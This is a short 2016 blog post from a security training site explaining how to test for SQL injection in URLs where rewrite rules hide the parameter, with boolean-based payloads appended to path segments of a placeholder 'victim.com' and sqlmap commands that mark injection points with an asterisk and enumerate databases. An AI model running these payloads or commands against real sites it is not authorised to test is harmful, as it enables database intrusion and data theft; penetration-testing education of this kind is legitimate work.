Home 0P3N Blog How to Test and Exploit SQL Injections in URL Rewrite Rules
Ready to Start Your Career?
Create Free Account
Babak Esmaeilis profile image
By: Babak Esmaeili
August 31, 2016

How to Test and Exploit SQL Injections in URL Rewrite Rules

By: Babak Esmaeili
August 31, 2016
Babak Esmaeilis profile image
By: Babak Esmaeili
August 31, 2016
How to Test and Exploit SQL Injections in URL Rewrite Rules - CybraryFirst of all, what is URL rewrite?You've likely seen sites with this schema in URLs: https://victim.com/?id=1Most everyone knows how to test for SQL injection in this situation ---> http://mysite.com/?id=1' or http://mysite.com/?id=1 and 2.5=2.5 or http://mysite.com/?id=1 and 3.4=3.5and etc.But, in URL rewrites, this UR http://victim.com/?id=1 will become http://victim.com/1 ,{id is hidden and the parameter 1 is used in url}For testing SQL injection in these kind of URLs, we just use our payloads as before, but after the parameter :http://victim.com/1' or http://victim.com/1 and 3.6=3.6http://victim.com/1 and 3.6=3.77and etc.The results would be the same as a normal post parameter.For  testing SQL injection with SQLMAP, we just use a star in the format. For instance:sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbsorsqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbsFor injecting in the content parameter, the star sign shows sqlmap where to inject payloads. Happy Hacking
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry